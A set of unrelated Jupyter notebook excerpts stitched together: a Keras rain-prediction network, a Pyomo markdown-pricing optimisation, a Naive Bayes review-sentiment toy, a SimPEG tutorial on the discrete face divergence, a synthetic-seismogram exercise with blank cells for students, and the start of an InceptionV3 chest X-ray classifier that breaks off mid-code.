1) This three-part series of youtube videos (totaling about an hour in length) https://www.youtube.com/watch?v=aircAruvnKk.
2) machinelearningmastery.com In fact, the model below is based off of this blog post (https://machinelearningmastery.com/binary-classification-tutorial-with-the-keras-deep-learning-library/)
```
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
## 1. Perform a test-train split, perform feature scaling, and the rebalance our dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=False)
## 2. Train (and build and compile) the Neural Network
## There are lots of hyperparameters here. Please read the comments to guide you in playing with them later!
### Build a very simple Neural Network and Compile
number_inputs = len(x_train_bal.columns)
# create model
nn = Sequential()
nn.add(Dense(number_inputs, input_dim=number_inputs, activation='relu'))
# Try uncommenting this to address overfitting
# from keras.regularizers import l2
# reg = l2(0.001)
# nn.add(Dense(number_inputs, activation='relu',bias_regularizer=reg,activity_regularizer=reg))
# try commenting out one and then the other
nn.add(Dense(1, activation='sigmoid'))
#nn.addDense(1, activation='softmax'))
# Compile model
# Also try changing the learning rate.
learning_rate = 0.001 # only used in the SGD optimizer.
# Also try commenting out one & then the other.
nn.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
#nn.compile(loss='binary_crossentropy', optimizer=keras.optimizers.SGD(lr=learning_rate), metrics=['accuracy'])
### Actually training the model
batch_size = 24 # The number of samples the network sees before it backpropagates (batch size) # 24 & 32 yield accuracy = 87%
epochs = 100 # The number of times the network will loop through the entire dataset (epochs)
shuffle = True # Set whether to shuffle the training data so the model doesn't see it sequentially
verbose = 2 # Set whether the model will output information when trained (0 = no output; 2 = output accuracy every epoch)
# Train the neural network!
start = time.time()
history = nn.fit(x_train_bal, y_train_bal, validation_data=(x_test_bal, y_test_bal),
batch_size=batch_size, epochs=epochs, shuffle=shuffle, verbose=verbose)
end = time.time()
print("Neural Network took "+str(end-start)+" seconds to train.")
#Accuracy & loss with epochs
#Neural networks train in epochs. During each epoch, the model trains by sweeping over each layer,
#adjusting weights based on their resulting errors, through processes called forward propagation and backpropagation.
#By plotting the model accuracy & loss which each epoch, we can visualize how the model error evolves with training.
figure, axes = plt.subplots(nrows=2,ncols=1)
figure.tight_layout(pad=3.0)
# plot accuracy during training
plt.subplot(211)
plt.title('Accuracy')
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend();
# plot loss during training
plt.subplot(212)
plt.title('Loss')
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.xlabel("Epoch");
plt.legend()
plt.show();
##3. Assess Neural Network's performance using testing data
## Though the accuracy is pictured above, additionally quantify recall on testing data with the
## same functions used previously to remain consistent
pred_test= (nn.predict(x_test_bal)>0.5).astype("int32")
nn_acc, nn_rec = bin_metrics(y_test_bal, pred_test)
plot_cm(y_test_bal, pred_test)
## 4. Check to see if the Neural Network is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
#Note: Neural networks can easily overfit because they are complex and can fit to the training data extremely well,
# Overfitting prevents neural networks from generalizing to other data (like the testing data).
# Compare testing data metrics to data training metrics.
print("Training metrics:")
nn_pred_train= (nn.predict(x_train_bal)>0.5).astype("int32")
bin_metrics(y_train_bal,nn_pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, pred_test);
## 5. Make a prediction with the Neural Network
# prediction output is in the format [probability no rain, probability rain]
nn_prediction = nn.predict(np.array(testpredictor).reshape(1, -1))[0][0]*100
print("The meteorological conditions are: ")
print(origvals)
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(nn_prediction, digits=2))
```
## SUMMARY: Compare all Four Machine Learning Models
```
model_metrics = pd.DataFrame({'Metrics':['Accuracy','Recall','Prediction example'],
'Logistic Regression':[lr_acc, lr_rec, lr_prediction],
'Random Forest':[forest_acc, forest_rec, forest_prediction],
'Singular Vector Machine':[svm_acc, svm_rec, svm_prediction],
'Neural Network':[nn_acc, nn_rec, nn_prediction]})
model_metrics = model_metrics.set_index('Metrics')
model_metrics
```
## STEP 4: Assess Feature Importance
Note: Feature Importance is not possible with non-linear Singular Vector Machines because the data is transformed by the kernel into another space that is unrelated to the input space.
```
## Feature importance in Logistical Regression Model
pd.DataFrame(abs(lr.coef_[0]),
index = x.columns,
columns=['importance']).sort_values('importance',ascending=False)
## Feature importance in Random Forest Model
pd.DataFrame(forest.feature_importances_,
index = x.columns,
columns=['importance']).sort_values('importance', ascending=False)
## Feature importance in Neural Network
cols = x.columns.values
nn_featimportance = []
for var in cols:
# create a vector corresponding to a 1 where the feature is located:
inputvector = np.array((cols==var).astype(int).reshape(1, -1))
nn_featimportance.append(nn.predict(inputvector)[0][0]*100)
pd.DataFrame( nn_featimportance,
index = x.columns,
columns=['importance']).sort_values('importance',ascending=False)
```
|
github_jupyter
|
# Q-PART C-15
```
from pulp import *
import pyomo.environ as pe
import logging
logging.getLogger('pyomo.core').setLevel(logging.ERROR)
from pyomo.environ import *
from math import pi
import warnings
warnings.filterwarnings('ignore')
m = ConcreteModel()
m.a = pe.Set(initialize=[1, 2, 3, 4])
m.demand = pe.Var(m.a, bounds=(1e-20,2500))
m.disc= pe.Var(m.a, bounds=(.1,.6))
m.saleVal = pe.Var(m.a, bounds=(.6*606,606))
m.inventory = pe.Var(m.a, bounds=(1e-20,2500))
m.age = Param([1,2,3,4], initialize={1:96, 2:97, 3:98, 4:99})
def inv_rule(m, i):
if i ==1:
return 2476 >= m.inventory[i] - m.demand[i]
else:
return m.inventory[i-1] >= m.inventory[i] - m.demand[i]
m.c1 = pe.Constraint(m.a, rule=inv_rule)
def demand_rule(m, i):
if i==1:
return m.demand[i] <= ((4.41125 + 3.89091 * m.disc[i] - 0.18602 * (m.age[i]**.5-1)/.5
-3.19977 * .579
+ 0.56468 * (48**.2 -1)/.2+ 0.80126)*.2+1)**5
else:
return m.demand[i] <= ((4.41125 + 3.89091 * m.disc[i] - 0.18602 * (m.age[i]**.5-1)/.5
-3.19977 * m.disc[i-1]
+ 0.56468 * (m.demand[i-1]**.2 -1)/.2+ 0.80126)*.2+1)**5
m.c2 = pe.Constraint(m.a, rule=demand_rule)
def disc_rule(m, i):
if i ==1:
return m.disc[i] >= .1
else:
return m.disc[i] >= m.disc[i-1]
m.c3 = pe.Constraint(m.a, rule=disc_rule)
def d_i_rule(m, i):
if i ==1:
return m.demand[i] <= 2476
else:
return m.demand[i] <= m.inventory[i-1]
m.c4 = pe.Constraint(m.a, rule=d_i_rule)
def d_i_rule2(m):
return sum([m.demand[i] for i in [1,2,3,4]]) <= 2476
m.c5 = pe.Constraint(rule=d_i_rule2)
m.o = Objective(expr=
(sum([m.demand[i]*(1-m.disc[i])*606 for i in [1,2,3,4]])), sense=maximize)
solver = SolverFactory('ipopt')
status = solver.solve(m)
print("Status = %s" % status.solver.termination_condition)
for i in [1,2,3,4]:
print("%s = %f" % (m.demand, value(m.demand[i])))
for i in [1,2,3,4]:
print("%s = %f" % (m.disc, value(m.disc[i])))
#print("%s = %f" % (m.disc, value(m.y)))
print("Objective = %f" % value(m.o))
#.pprint()
```
##### Analysis
We have used non-linear optimization to derive the outcome.
- The discounts offerred as per the plan:
- Week 1 - 10%
- Week 2 - 15%
- Week 3 - 31%
- Week 4 - 41%
- Units sold would be:
- Week 1 - 16
- Week 2 - 22
- Week 3 - 33
- Week 4 - 41
- Revenue from Sales: 48103, which is higher than 41302 which he made in reality.
Store would have sold less units 112, compared to the 159 the shop sold, but the revenue generated would have been close to 7000 more (without taking into consideration the extra profit he would make by selling the additional units for 60% discount approximately 11000). So in total, he would have made an extra 18000 by using the above optimization strategy.
# Q-3
```
data = ["Service was very good. Excellent breakfast in beautiful restaurant included in price. I was happy there and extended my stay for extra two days.",
"Really helpful staff, the room was clean, beds really comfortable. Great roof top restaurant with yummy food and very friendly staff.",
"Good location. The Cleanliness part was superb.",
"I stayed for two days in deluxe A/C room (Room no. 404). I think it is renovated recently. Staff behaviour, room cleanliness all are fine.",
"The room and public spaces were infested with mosquitoes. I killed a dozen or so in my room prior to sleeping but still woke up covered in bites.",
"Unfriendly staff with no care for guests.",
"Very worst and bad experience, Service I got from the hotel reception is too worst and typical.",
"Good location but the staff was unfriendly"
]
data = pd.DataFrame(data)
data.columns = ['text']
data['sentiment'] = [1,1,1,1,0,0,0,-3]
def clean_text(x):
splchars = re.compile(r'[^A-Za-z ]',re.IGNORECASE)
x = splchars.sub('', x)
x = word_tokenize(x.lower())
x = [w for w in x if w not in stopwords]
return(' '.join(x))
data.fillna('NA', inplace=True)
data['text_clean'] = data['text'].apply(lambda x: clean_text(x.lower()))
count_vec_v1 = CountVectorizer(stop_words=stopwords,
ngram_range=(1,2), max_features=5000)
count_vec_dict = count_vec_v1.fit(data.text_clean)
reviews_text_vec = count_vec_v1.transform(data.text)
df_reviews = pd.DataFrame(reviews_text_vec.toarray())
df_reviews.columns = count_vec_dict.get_feature_names()
print("Data with all possible 1,2 Grams.")
df_reviews.head()
columns = ['Beautiful', 'Good Service', 'Good Location', 'Superb', 'Cleanliness', 'Mosquitoes',
'Unfriendly', 'bad experience']
columns = [c.lower() for c in columns]
print("Phrases / Words to consider")
columns
df_reviews = df_reviews[list(set(columns).intersection(set(df_reviews.columns)))]
print("Train data")
df_reviews
y_train = data.sentiment[:-1]
X_train = df_reviews.iloc[:-1,]
X_test = pd.DataFrame(df_reviews.iloc[-1,:]).T
print("Test Data")
X_test
print("As we can see from above 'good service' is not available in the training set / test set and hence it will not be considered for model building")
print("building Naive Bayes Model..")
bayes_clf = BernoulliNB()
bayes_clf.fit(X_train, y_train)
pred = bayes_clf.predict_proba(X_test)
print("Probability of Negative Sentiment is : {}".format(pred[0, 0]))
print("Probability of Positive Sentiment is : {}".format(pred[0, 1]))
```
|
github_jupyter
|
# Building our operators: the Face Divergence
The divergence is the integral of a flux through a closed surface as that enclosed volume shrinks to a point. Since we have discretized and no longer have continuous functions, we cannot fully take the limit to a point; instead, we approximate it around some (finite!) volume: *a cell*. The flux out of the surface ($\vec{j} \cdot \vec{n}$) is actually how we discretized $\vec{j}$ onto our mesh (i.e. $\bf{j}$) except that the face normal points out of the cell (rather than in the axes direction). After fixing the direction of the face normal (multiplying by $\pm 1$), we only need to calculate the face areas and cell volume to create the discrete divergence matrix.
<img src="./images/Divergence.png" width=80% align="center">
<h4 align="center">Figure 4. Geometrical definition of the divergence and the discretization.</h4>
## Implementation
Although this is a really helpful way to think about conceptually what is happening, the implementation of that would be a huge for loop over each cell. In practice, this would be slow, so instead, we will take advantage of linear algebra. Let's start by looking at this in 1 dimension using the SimPEG Mesh class.
```
import numpy as np
from SimPEG import Mesh
import matplotlib.pyplot as plt
%matplotlib inline
plt.set_cmap(plt.get_cmap('viridis')) # use a nice colormap!
# define a 1D mesh
mesh1D = Mesh.TensorMesh([5]) # with 5 cells
fig, ax = plt.subplots(1,1, figsize=(12,2))
ax.plot(mesh1D.gridN, np.zeros(mesh1D.nN),'-k',marker='|',markeredgewidth=2, markersize=16)
ax.plot(mesh1D.gridCC,np.zeros(mesh1D.nC),'o')
ax.plot(mesh1D.gridFx,np.zeros(mesh1D.nFx),'>')
ax.set_title('1D Mesh')
# and define a vector of fluxes that live on the faces of the 1D mesh
face_vec = np.r_[0., 1., 2., 2., 1., 0.] # vector of fluxes that live on the faces of the mesh
print("The flux on the faces is {}".format(face_vec))
plt.plot(mesh1D.gridFx, face_vec, '-o')
plt.ylim([face_vec.min()-0.5, face_vec.max()+0.5])
plt.grid(which='both')
plt.title('face_vec');
```
Over a single cell, the divergence is
$$
\nabla \cdot \vec{j}(p) = \lim_{v \to \{p\}} = \int \int_{S(v)} \frac{\vec{j}\cdot \vec{n}}{v} dS
$$
in 1D, this collapses to taking a single difference - how much is going out of the cell vs coming in?
$$
\nabla \cdot \vec{j} \approx \frac{1}{v}(-j_{\text{left}} + j_{\text{right}})
$$
Since the normal of the x-face on the left side of the cell points in the positive x-direction, we multiply by -1 to get the flux going out of the cell. On the right, the normal defining the x-face is point out of the cell, so it is positive.
```
# We can take the divergence over the entire mesh by looping over each cell
div_face_vec = np.zeros(mesh1D.nC) # allocate for each cell
for i in range(mesh1D.nC): # loop over each cell and
div_face_vec[i] = 1.0/mesh1D.vol[i] * (-face_vec[i] + face_vec[i+1])
print("The face div of the 1D flux is {}".format(div_face_vec))
```
Doing it as a for loop is easy to program for the first time,
but is difficult to see what is going on and could be slow!
Instead, we can build a faceDiv matrix (note: this is a silly way to do this!)
```
faceDiv = np.zeros([mesh1D.nC, mesh1D.nF]) # allocate space for a face div matrix
for i in range(mesh1D.nC): # loop over each cell
faceDiv[i, [i, i+1]] = 1.0/mesh1D.vol[i] * np.r_[-1,+1]
print("The 1D face div matrix for this mesh is \n{}".format(faceDiv))
assert np.all( faceDiv.dot(face_vec) == div_face_vec ) # make sure we get the same result!
print("\nThe face div of the 1D flux is still {}!".format(div_face_vec))
```
the above is still a loop... (and python is not a fan of loops).
Also, if the mesh gets big, we are storing a lot of unnecessary zeros
```
"There are {nnz} zeros (too many!) that we are storing".format(nnz = np.sum(faceDiv == 0))
```
### Working in Sparse
We will use instead *sparse* matrices instead. These are in scipy and act almost the same as numpy arrays (except they default to matrix multiplication), and they don't store all of those pesky zeros! We use [scipy.sparse](http://docs.scipy.org/doc/scipy/reference/sparse.html) to build these matrices.
```
import scipy.sparse as sp
from SimPEG.Utils import sdiag # we are often building sparse diagonal matrices, so we made a functio in SimPEG!
# construct differencing matrix with diagonals -1, +1
sparse_diff = sp.spdiags((np.ones((mesh1D.nC+1, 1))*[-1, 1]).T, [0, 1], mesh1D.nC, mesh1D.nC+1, format="csr")
print("the sparse differencing matrix is \n{}".format(sparse_diff.todense()))
# account for the volume
faceDiv_sparse = sdiag(1./mesh1D.vol) * sparse_diff # account for volume
print("\n and the face divergence is \n{}".format(faceDiv_sparse.todense()))
print("\n but now we are only storing {nnz} nonzeros".format(nnz=faceDiv_sparse.nnz))
assert np.all(faceDiv_sparse.dot(face_vec) == div_face_vec)
print("\n and we get the same answer! {}".format(faceDiv_sparse * face_vec))
```
In SimPEG, this is stored as the `faceDiv` property on the mesh
```
print(mesh1D.faceDiv * face_vec) # and still gives us the same answer!
```
## Moving to 2D
To move up in dimensionality, we build a 2D mesh which has both x and y faces
```
mesh2D = Mesh.TensorMesh([100,80])
mesh2D.plotGrid()
plt.axis('tight');
```
We define 2 face functions, one in the x-direction and one in the y-direction. Here, we choose to work with sine functions as the continuous divergence is easy to compute, meaning we can test it!
```
jx_fct = lambda x, y: -np.sin(2.*np.pi*x)
jy_fct = lambda x, y: -np.sin(2.*np.pi*y)
jx_vec = jx_fct(mesh2D.gridFx[:,0], mesh2D.gridFx[:,1])
jy_vec = jy_fct(mesh2D.gridFy[:,0], mesh2D.gridFy[:,1])
j_vec = np.r_[jx_vec, jy_vec]
print("There are {nFx} x-faces and {nFy} y-faces, so the length of the "
"face function, j, is {lenj}".format(
nFx=mesh2D.nFx,
nFy=mesh2D.nFy,
lenj=len(j_vec)
))
plt.colorbar(mesh2D.plotImage(j_vec, 'F', view='vec')[0])
```
### But first... what does the matrix look like?
Now, we know that we do not want to loop over each of the cells and instead want to work with matrix-vector products. In this case, each row of the divergence matrix should pick out the two relevant faces in the x-direction and two in the y-direction (4 total).
When we unwrap our face function, we unwrap using column major ordering, so all of the x-faces are adjacent to one another, while the y-faces are separated by the number of cells in the x-direction (see [mesh.ipynb](mesh.ipynb) for more details!).
When we plot the divergence matrix, there will be 4 "diagonals",
- 2 that are due to the x-contribution
- 2 that are due to the y-contribution
Here, we define a small 2D mesh so that it is easier to see the matrix structure.
```
small_mesh2D = Mesh.TensorMesh([3,4])
print("Each y-face is {} entries apart".format(small_mesh2D.nCx))
print("and the total number of x-faces is {}".format(small_mesh2D.nFx))
print("So in the first row of the faceDiv, we have non-zero entries at \n{}".format(
small_mesh2D.faceDiv[0,:]))
```
Now, lets look at the matrix structure
```
fig, ax = plt.subplots(1,2, figsize=(12,4))
# plot the non-zero entries in the faceDiv
ax[0].spy(small_mesh2D.faceDiv, ms=2)
ax[0].set_xlabel('2D faceDiv')
small_mesh2D.plotGrid(ax=ax[1])
# Number the faces and plot. (We should really add this to SimPEG... pull request anyone!?)
xys = zip(
small_mesh2D.gridFx[:,0],
small_mesh2D.gridFx[:,1],
range(small_mesh2D.nFx)
)
for x,y,ii in xys:
ax[1].plot(x, y, 'r>')
ax[1].text(x+0.01, y-0.02, ii, color='r')
xys = zip(
small_mesh2D.gridFy[:,0],
small_mesh2D.gridFy[:,1],
range(small_mesh2D.nFy)
)
for x,y,ii in xys:
ax[1].plot(x, y, 'g^')
ax[1].text(x-0.02, y+0.02, ii+small_mesh2D.nFx, color='g')
ax[1].set_xlim((-0.1,1.1));
ax[1].set_ylim((-0.1,1.1));
```
How did we construct the matrix? - Kronecker products.
There is a handy identity that relates the vectorized face function to its matrix form (<a href = "https://en.wikipedia.org/wiki/Vectorization_(mathematics)#Compatibility_with_Kronecker_products">wikipedia link!</a>)
$$
\text{vec}(AUB^\top) = (B \otimes A) \text{vec}(U)
$$
For the x-contribution:
- A is our 1D differential operator ([-1, +1] on the diagonals)
- U is $j_x$ (the x-face function as a matrix)
- B is just an identity
so
$$
\text{Div}_x \text{vec}(j_x) = (I \otimes Div_{1D}) \text{vec}(j_x)
$$
For the y-contribution:
- A is just an identity!
- U is $j_y$ (the y-face function as a matrix)
- B is our 1D differential operator ([-1, +1] on the diagonals)
so
$$
\text{Div}_y \text{vec}(j_y) = (\text{Div}_{1D} \otimes I) \text{vec}(j_y)
$$
$$
\text{Div} \cdot j = \text{Div}_x \cdot j_x + \text{Div}_y \cdot j_y = [\text{Div}_x, \text{Div}_y] \cdot [j_x; j_y]
$$
And $j$ is just $[j_x; j_y]$, so we can horizontally stack $\text{Div}_x$, $\text{Div}_y$
$$
\text{Div} = [\text{Div}_x, \text{Div}_y]
$$
You can check this out in the SimPEG docs by running **small_mesh2D.faceDiv??**
```
# small_mesh2D.faceDiv?? # check out the code!
```
Now that we have a discrete divergence, lets check out the divergence of the face function we defined earlier.
```
Div_j = mesh2D.faceDiv * j_vec
fig, ax = plt.subplots(1,2, figsize=(8,4))
plt.colorbar(mesh2D.plotImage(j_vec, 'F', view='vec', ax=ax[0])[0],ax=ax[0])
plt.colorbar(mesh2D.plotImage(Div_j, ax=ax[1])[0],ax=ax[1])
ax[0].set_title('j')
ax[1].set_title('Div j')
plt.tight_layout()
```
### Are we right??
Since we chose a simple function,
$$
\vec{j} = - \sin(2\pi x) \hat{x} - \sin(2\pi y) \hat{y}
$$
we know the continuous divergence...
$$
\nabla \cdot \vec{j} = -2\pi (\cos(2\pi x) + \cos(2\pi y))
$$
So lets plot it and take a look
```
# from earlier
# jx_fct = lambda x, y: -np.sin(2*np.pi*x)
# jy_fct = lambda x, y: -np.sin(2*np.pi*y)
sol = lambda x, y: -2*np.pi*(np.cos(2*np.pi*x)+np.cos(2*np.pi*y))
cont_div_j = sol(mesh2D.gridCC[:,0], mesh2D.gridCC[:,1])
Div_j = mesh2D.faceDiv * j_vec
fig, ax = plt.subplots(1,2, figsize=(8,4))
plt.colorbar(mesh2D.plotImage(Div_j, ax=ax[0])[0],ax=ax[0])
plt.colorbar(mesh2D.plotImage(cont_div_j, ax=ax[1])[0],ax=ax[1])
ax[0].set_title('Discrete Div j')
ax[1].set_title('Continuous Div j')
plt.tight_layout()
```
Those look similar :)
### Order Test
We can do better than just an eye-ball comparison - since we are using a a staggered grid, with centered differences, the discretization should be second-order ($\mathcal{O}(h^2)$). That is, as we refine the mesh, our approximation of the divergence should improve by a factor of 2.
SimPEG has a number of testing functions for
[derivatives](http://docs.simpeg.xyz/content/api_core/api_Tests.html#SimPEG.Tests.checkDerivative)
and
[order of convergence](http://docs.simpeg.xyz/content/api_core/api_Tests.html#SimPEG.Tests.OrderTest)
to make our lives easier!
```
import unittest
from SimPEG.Tests import OrderTest
jx = lambda x, y: -np.sin(2*np.pi*x)
jy = lambda x, y: -np.sin(2*np.pi*y)
sol = lambda x, y: -2*np.pi*(np.cos(2*np.pi*x)+np.cos(2*np.pi*y))
class Testify(OrderTest):
meshDimension = 2
def getError(self):
j = np.r_[jx(self.M.gridFx[:,0], self.M.gridFx[:,1]),
jy(self.M.gridFy[:,0], self.M.gridFy[:,1])]
num = self.M.faceDiv * j # numeric answer
ans = sol(self.M.gridCC[:,0], self.M.gridCC[:,1]) # note M is a 2D mesh
return np.linalg.norm((num - ans), np.inf) # look at the infinity norm
# (as we refine the mesh, the number of cells
# changes, so need to be careful if using a 2-norm)
def test_order(self):
self.orderTest()
# This just runs the unittest:
suite = unittest.TestLoader().loadTestsFromTestCase( Testify )
unittest.TextTestRunner().run( suite );
```
Looks good - Second order convergence!
## Next up ...
In the [next notebook](weakformulation.ipynb), we will explore how to use the weak formulation to discretize the DC equations.
|
github_jupyter
|
# Synthetic seismogram
This notebook looks at the convolutional model of a seismic trace.
For a fuller example, see [Bianco, E (2004)](https://github.com/seg/tutorials-2014/blob/master/1406_Make_a_synthetic/how_to_make_synthetic.ipynb) in *The Leading Edge*.
First, the usual preliminaries.
```
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
```
## Load geophysical data
We'll use `lasio` to faciliate loading curves from an LAS file.
```
from welly import Well
w = Well.from_las('../data/L-30.las')
dt = w.data["DT"]
rhob = w.data["RHOB"]
dt
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Convert the logs to SI units</li>
</ul>
</div>
```
dt =
rhob =
```
Compute velocity and thus acoustic impedance.
```
from utils import vp_from_dt, impedance, rc_series
vp = vp_from_dt(dt)
ai = impedance(vp, rhob)
z = dt.basis
plt.figure(figsize=(16, 2))
plt.plot(z, ai, lw=0.5)
plt.show()
```
## Depth to time conversion
The logs are in depth, but the seismic is in travel time. So we need to convert the well data to time.
We don't know the seismic time, but we can model it from the DT curve: since DT is 'elapsed time', in microseconds per metre, we can just add up all these time intervals for 'total elapsed time'. Then we can use that to 'look up' the time of a given depth.
We use the step size to scale the DT values to 'seconds per step' (instead of µs/m).
```
scaled_dt = dt.step * np.nan_to_num(dt) / 1e6 # Convert to seconds per step
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Do the arithmetic to find the timing of the top of the log.</li>
</ul>
</div>
```
dt.start, w.las.header['Well']['STRT']
kb = 0.3048 * w.las.header['Well']['KB'].value
gl = 0.3048 * w.las.header['Well']['GL'].value
start = dt.start
v_water = 1480
v_repl = 1800
water_layer = # Depth of water
repl_layer = # Thickness of replacement layer
water_twt = # TWT in water, using water_layer and v_water
repl_twt = # TWT in replacement layer, using repl_layer and v_repl
print("Water time: {:.3f} ms\nRepl time: {:.3f} ms".format(water_twt, repl_twt))
```
You should get
Water time: 0.186 ms
Repl time: 0.233 ms
Now finally we can compute the cumulative time elapsed on the DT log:
```
dt_time = water_twt + repl_twt + 2*np.cumsum(scaled_dt)
dt_time[-1]
```
And then use this to convert the logs to a time basis:
```
delt = 0.004 # Sample interval.
maxt = np.ceil(dt_time[-1]) # Max time that we need; just needs to be longer than the log.
# Make a regular time basis: the seismic time domain.
seis_time = np.arange(0, maxt, delt)
# Interpolate the AI log onto this basis.
ai_t = np.interp(seis_time, dt_time, ai)
# Let's do the depth 'log' too while we're at it.
z_t = np.interp(seis_time, dt_time, z)
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Make a time-conversion function to get time-converted logs from `delt`, `maxt`, `dt_time`, and a log.</li>
<li>- Make a function to get `dt_time` from `kb`, `gl`, `dt`, `v_water`, `v_repl`.</li>
<li>- Recompute `ai_t` by calling your new functions.</li>
<li>- Plot the DT log in time.</li>
</ul>
</div>
```
def time_convert(log, dt_time, delt=0.004, maxt=3.0):
"""
Converts log to the time domain, given dt_time, delt, and maxt.
dt_time is elapsed time regularly sampled in depth. log must
be sampled on the same depth basis.
"""
# Your code here!
return log_t
def compute_dt_time(dt, kb, gl, v_repl, v_water=1480):
"""
Compute DT time from the dt log and some other variables.
The DT log must be a welly curve object.
"""
# Your code here!
return dt_time
```
Now, at last, we can compute the reflection coefficients in time.
```
from utils import rc_vector
rc = rc_vector(ai_t)
rc[np.isnan(rc)] = 0
```
Plotting these is a bit more fiddly, because we would like to show them as a sequence of spikes, rather than as a continuous curve, and matplotlib's `axvline` method wants everything in terms of fractions of the plot's dimensions, not as values in the data space.
```
plt.figure(figsize=(16, 2))
pts, stems, base = plt.stem(seis_time[1:], rc)
plt.setp(pts, markersize=0)
plt.setp(stems, lw=0.5)
plt.setp(base, lw=0.75)
plt.show()
```
## Impulsive wavelet
Convolve with a wavelet.
```
from bruges.filters import ricker
f = 25
w, t = ricker(0.128, 0.004, f, return_t=True)
plt.plot(t, w)
plt.show()
syn = np.convolve(rc, w, mode='same')
plt.figure(figsize=(16,2))
plt.plot(seis_time[1:], syn)
plt.show()
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Try to plot the RC series with the synthetic.</li>
<li>- You'll need to zoom in a bit to see much, try using a slice of `[300:350]` on all x's and y's.</li>
</ul>
</div>
If the widgets don't show up, you might need to do this:
jupyter nbextension enable --py widgetsnbextension
If we are recording with dynamite or even an airgun, this might be an acceptable model of the seismic. But if we're using Vibroseis, things get more complicated. To get a flavour, try another wavelet in `bruges.filters`, or check out the notebooks:
- [Vibroseis data](../notebooks/Vibroseis_data.ipynb)
- [Wavelets and sweeps](../notebooks/Wavelets_and_sweeps.ipynb)
## Compare with the seismic
```
seismic = np.loadtxt('../data/Penobscot_xl1155.txt')
syn.shape
```
The synthetic is at trace number 77. We need to make a shifted version of the synthetic to overplot.
```
tr = 77
gain = 50
s = tr + gain*syn
```
And we can define semi-real-world cordinates of the seismic data:
```
extent = (0, 400, 4.0, 0)
plt.figure(figsize=(10,20))
plt.imshow(seismic.T, cmap='Greys', extent=extent, aspect='auto')
plt.plot(s, seis_time[1:])
plt.fill_betweenx(seis_time[1:], tr, s, where=syn>0, lw=0)
plt.xlim(0, 400)
plt.ylim(3.2, 0)
plt.show()
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>Load your tops data from `Reading data from files.ipynb` (using `from utils import tops` perhaps), or using the function you made in [`Practice functions`](Practice_functions.ipynb).</li>
<li>- Use the time-converted 'depth', `z_t`, to convert depths to time.</li>
<li>- Plot the tops on the seismic.</li>
</ul>
</div>
```
from utils import get_tops_from_file
tops = get_tops_from_file('../data/L-30_tops.txt')
```
<div class="alert alert-success">
<b>Exercise</b>:
<ul>
<li>- Make functions for the wavelet creation, synthetic generation, and synthetic plotting steps.</li>
<li>- Make a master function that takes the name of an LAS file, plus any other required info (such as `delt`), and returns a tuple of arrays: a time basis, and the synthetic amplitudes. You could make saving a plot optional.</li>
<li>- Copy this notebook and make an offset synthetic for `R-39.las`, which has a shear-wave DT.</li>
</ul>
</div>
<hr />
<div>
<img src="https://avatars1.githubusercontent.com/u/1692321?s=50"><p style="text-align:center">© Agile Geoscience 2016</p>
</div>
|
github_jupyter
|
<a href="https://colab.research.google.com/github/Serbeld/RX-COVID-19/blob/master/Detection5C_NormNew_v2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
!pip install lime
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.applications import inception_v3
from tensorflow.keras.layers import Dense,Dropout,Flatten,Input,AveragePooling2D,BatchNormalization
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.utils import to_categorical
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import cv2
import os
import lime
from lime import lime_image
from skimage.segmentation import mark_boundaries
import pandas as pd
plt.rcParams["figure.figsize"] = (10,5)
#Loading the dataset
!pip install h5py
import h5py
from google.colab import drive,files
drive.mount('/content/drive')
hdf5_path = '/content/drive/My Drive/Dataset5C/Dataset5C.hdf5'
dataset = h5py.File(hdf5_path, "r")
import numpy as np
import matplotlib.pylab as plt
#train
train_img = dataset["train_img"]
xt = np.array(train_img)
yt = np.array(dataset["train_labels"])
#test
testX = np.array(dataset["test_img"])
testY = np.array(dataset["test_labels"])
#Validation
xval = np.array(dataset["val_img"])
yval = np.array(dataset["val_labels"])
print("Training Shape: "+ str(xt.shape))
print("Validation Shape: "+ str(xval.shape))
print("Testing Shape: "+ str(testX.shape))
#Categorical values or OneHot
import keras
num_classes = 5
yt = keras.utils.to_categorical(yt,num_classes)
testY = keras.utils.to_categorical(testY,num_classes)
yval = keras.utils.to_categorical(yval,num_classes)
#Image
num_image = 15
print()
print('Healthy: [1 0 0 0 0]')
print('Pneumonia & Covid-19: [0 1 0 0 0]')
print('Cardiomegaly: [0 0 1 0 0]')
print('Other respiratory disease: [0 0 0 1 0]')
print('Pleural Effusion: [0 0 0 0 1]')
print()
print("Output: "+ str(yt[num_image]))
imagen = train_img[num_image]
plt.imshow(imagen)
plt.show()
## global params
INIT_LR = 1e-5 # learning rate
EPOCHS = 10 # training epochs
BS = 4 # batch size
## build network
from tensorflow.keras.models import load_model
#Inputs
inputs = Input(shape=(512, 512, 3), name='images')
inputs2 = BatchNormalization()(inputs)
#Inception Model
output1 = inception_v3.InceptionV3(include_top=False,weights= "imagenet",
input_shape=(512, 512, 3),
classes = 5)(inputs2)
#AveragePooling2D
output = AveragePooling2D(pool_size=(2, 2), strides=None,
padding='valid',name='AvgPooling')(output1)
#Flattened
output = Flatten(name='Flatten')(output)
#Dropout
